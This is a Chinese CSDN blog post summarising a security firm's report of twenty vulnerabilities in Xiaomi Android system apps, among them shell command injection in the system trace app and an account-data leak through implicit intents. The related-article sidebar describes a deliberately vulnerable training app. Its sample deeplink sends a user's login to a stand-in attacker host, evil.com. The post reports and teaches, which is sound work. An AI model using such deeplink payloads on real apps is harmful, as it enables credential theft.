小米Andoird设备近日被爆多个安全漏洞,影响所有小米用户

最新推荐文章于 2024-06-26 20:32:31 发布
最新推荐文章于 2024-06-26 20:32:31 发布
阅读量555 收藏 2
点赞数 11
分类专栏: 信息分享 文章标签: 网络安全 安全 系统安全 web安全 android 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ooooooih/article/details/138558256
版权

在5月2号,移动安全公司Oversecured在一份分享的报告中表示:“小米设备中的应用程序或系统程序的漏洞导致使用系统权限访问任意活动、接收器和服务,使用系统权限盗窃任意文件,以及泄露手机、设置和小米账户数据。”

这 20 个漏洞影响不同的应用程序和组件,包括:

  • 画廊 (com.miui.gallery)

  • GetApps (com.xiaomi.mipicks)

  • 小米视频(com.miui.videoplayer)

  • MIUI蓝牙(com.xiaomi.bluetooth)

  • 电话服务 (com.android.phone)

  • 后台打印程序 (com.android.printspooler)

  • 安全(com.miui.securitycenter)

  • 安全核心组件(com.miui.securitycore)

  • 设置(com.android.settings)

  • 分享我 (com.xiaomi.midrop)

  • 系统跟踪 (com.android.traceur)

  • 小米云(com.miui.cloudservice)

一些值得注意的缺陷包括影响系统追踪应用的Shell命令注入漏洞,以及应用设置中的缺陷,这些缺陷可能导致任意文件被盗取,以及泄露有关蓝牙设备、已连接的Wi-Fi网络和紧急联系人的信息。

由于小米视频使用 implicit intents 通过广播发送小米帐户信息,例如用户名和电子邮件地址,这些信息可以被设备上安装的任何第三方应用程序通过其广播接收器拦截,可能会导致隐私泄漏。

Oversecured 表示,这些问题已在 2024 年 4 月 25 日至 4 月 30 日期间的五天内报告给了小米。建议用户安装最新更新以防范潜在威胁。

完整报告可见:https://blog.oversecured.com/20-Security-Issues-Found-in-Xiaomi-Devices/

欢迎关注我的公众号“混入安全圈的程序猿”,更多原创文章第一时间推送 

混入安全圈的程序猿
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
红米K40重启的解决方案
jonepjxh的博客
06-09 3万+
红米K40重启的问题是最近才出现的,并且重启了以后有时候无法进入系统,特别是重启上四五次甚至是10次,要不然就清除数据才能进入系统,我这个手机是解锁的手机。刚开始认为是手机过热的原因造成的,然后买了手机散热器对手机进行散热,在使用过程中发现,手机即使在不热的情况下也会重启,造成数据的丢失,这就让我引起了很大的注意,可能是手机内部系统的问题,特别是小米的miui系统,不允许禁止应用商店和浏览器这些程序,如果这些程序禁用的话,手机会重启,并且会清除所有的数据,容易造成卡米的现象。再一次重启后将系统数据全部清除,
Perfetto —— 靠谱的trace利器
PefectWorld的博客
07-28 4904
最近踩到的坑,报了一个cst的测试项fail,帧率不符合预期,对于的进程是android.view.cts 肯定是要抓sytrace看看了 但是,试了systrace和atrace去抓,只抓了launcher的绘制,并没有android.view.cts的绘制信息 用-a指定app也是一样 经过实验,可以试下perfetto抓取(果然,google极力推荐使用还是没错的,要跟上工具的变化) 1、开启trace UI am start com.android.traceur/com.android
Android性能分析工具-Perfetto基本使用
最新发布
adorable_的博客
06-26 1627
Perfetto 是一个用于性能检测和跟踪分析的生产级开源堆栈。它提供用于记录系统级和应用级跟踪的服务和库、本机 + Java 堆分析、使用 SQL 分析跟踪的库以及用于可视化和探索多 GB 跟踪的基于 Web 的 UI。
ovaa:过度安全的易受攻击的Android应用程序
04-13
描述 OVAA(Oversecured Vulnerable Android App)是一个Android应用程序,它汇总了该平台的所有已知和流行的安全漏洞漏洞清单 本节仅包括漏洞列表,而没有详细的描述或概念证明。 OVAA的示例将在上得到详细的检查和分析。 通过login_url deeplink安装任意的login_url oversecured://ovaa/login?url=http://evil.com/ 。 导致用户登录时泄露其用户名和密码。 通过oversecured://ovaa/grant_uri_permissions获得对任意内容提供程序(未导出,但具有android:grantUriPermissions="true" )的oversecured://ovaa/grant_uri_permissions 。 攻击者的应用程序需要处理oversecured.
国产平台之T507 开发板Android 安全策略漫谈
ningmengzier的博客
12-04 136
硬件平台:飞凌嵌入式 OKT507-C开发板 操作系统:Android10.0 飞凌嵌入式 T507 开发板 Android系统版本为Android10.0,默认开启了SELinux。基于MAC访问控制模型的SElinux,可以更好地保护我们的Android系统, 比如限制系统服务的访问权限、控制应用对数据和系统日志的访问等措施,这样就降低了恶意软件的影响,并且可以防止因代码存在的缺陷而产生的对系统安全影响。 从系统安全方面考虑,SELinux是保护神,但是从软件开发方面,SELinux就是一道
Android性能优化之Perfetto
weixin_44901612的博客
09-26 5377
Perfetto 一. 通过System Tracing抓取 1. System Tracing Overview System Tracing即系统跟踪界面,用户可以通过如下两种方式进入系统跟踪界面: (1)设置 – 其他设置 – 开发者选项 – 系统跟踪(Realme GT Neo 闪速版); (2)adb shell am start com.android.traceur/com.android.traceur.MainActivity; 2. System Tracing Options 系统跟
小米5安卓11最新系统lineage-18.1小米5.zip
05-31
总的来说,"小米5安卓11最新系统lineage-18.1小米5.zip"为小米5用户提供了一个基于Android 11的高级定制系统,结合LineageOS的优势,旨在提供更好的性能、安全性和自定义体验。然而,刷入前请确保了解刷机流程,并...
小米手机无需刷入Recovery获取Root权限工具包
09-05
在智能手机世界中,Root权限是Android系统的一种高级访问权限,允许用户访问并修改系统的底层文件,从而实现更多自定义和优化功能。对于小米手机用户来说,通常为了获取这种权限,需要先刷入第三方Recovery,这是一...
android 手机运行 backtrack 5 小米_免费下载.doc
07-04
标题中的“android 手机运行 backtrack 5 小米”是指在小米智能手机上运行 BackTrack 5 操作系统,这是一款基于 Linux 的安全审计和渗透测试发行版,通常用于网络安全专业人士进行漏洞检测和黑客防御。描述中的...
小米5 第三方RES
06-26
同时,由于非官方性质,可能存在潜在风险,比如安全漏洞或者稳定性问题。确保从可信赖的源获取RES,并随时关注开发者发布的更新和修复信息,以保持最佳的使用体验。 总的来说,小米5第三方RES 3.2.1.1提供了一种为...
手机刷机_刷机包_小米刷机_xiaomi-mi-note-lte_5.12.4_4.4.4_2019.11.25
01-01
刷机是指更换手机的操作系统或用户界面,通常是为了获取更先进的功能、优化设备性能或者修复原厂系统的漏洞。在小米Note LTE的例子中,刷入的系统版本为5.12.4,基于Android 4.4.4,发布日期为2019年11月25日。 ...
nr285G最终版固件
04-13
NR285G千兆路由器固件,强大的QOS功能,令宿舍,出租房不再为带宽分配烦恼
OPPO ColorOS adb精简列表
热门推荐
我的博客
01-17 3万+
删除指令adb shell pm uninstall –user 0 包名 恢复指令adb shell pm install-existing –user 0 包名 ---指令后空格加需要精简组件的包名 ======================================== adb shell pm disable-user 包名 不想删除的,可以使用这个命令停用服务. 例如:adb shell pm disable-user com.oppo.ota ======================
Android性能优化工具
BC时间
03-07 1580
CPU 性能分析器可以在APP运行时,实时检查应用的 CPU 使用率和线程活动,也可以检查记录的方法轨迹、函数轨迹和系统轨迹的详情。(1)Sample JAVA Methods不能采集耗时很短的方法,而Trace JAVA Methods可以采集耗时很短的方法;
Android APP代码执行历史漏洞与攻击面分析
道阻且长,行则将至。
03-19 1727
为了挖掘 Android 端侧任意代码执行类型的漏洞,四处搜寻了相关的历史公开 CVE 漏洞,学习到了一些思路与方法,在此做下简要分析与总结。
perfetto使用简介
dk_work的博客
09-08 4924
perfetto使用简介 文章目录perfetto使用简介一、使用方法1.1 打开perfetto的设置界面1.1.1 adb指令1.1.2 系统设置1.2 打开录制跟踪记录功能1.3 打开跟踪记录功能后,运行需要调试的APP1.4 运行完操作之后点击,可点击下拉菜单停止跟踪记录1.5 导出trace文件二、打开trace文件2.1 google浏览器打开perfetto网址2.2 打开trace文件!三、可以开始分析了 一、使用方法 1.1 打开perfetto的设置界面 1.1.1 adb指令 adb
android8精简列表,小米8手机MIUI12精简列表
weixin_34035088的博客
05-28 1万+
今天奉上小米8手机精简列表,喜欢的朋友可以自己捣鼓捣鼓,这是可删除部分和不可删除部分,绝对不能删除,删除了手机不能重启,只有双清后才能重启,所以请小伙伴们也做好数据备份,以防万一。以下内容是可以删除的:com.android.wallpapercroppercom.android.providers.downloads.uicom.qualcomm.qti.performancemode性能模式c...
Android 卡顿验证方法1:系统跟踪 Perfetto
marchlqq的专栏
05-11 4401
Android 卡顿验证方法1:系统跟踪 Perfetto
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值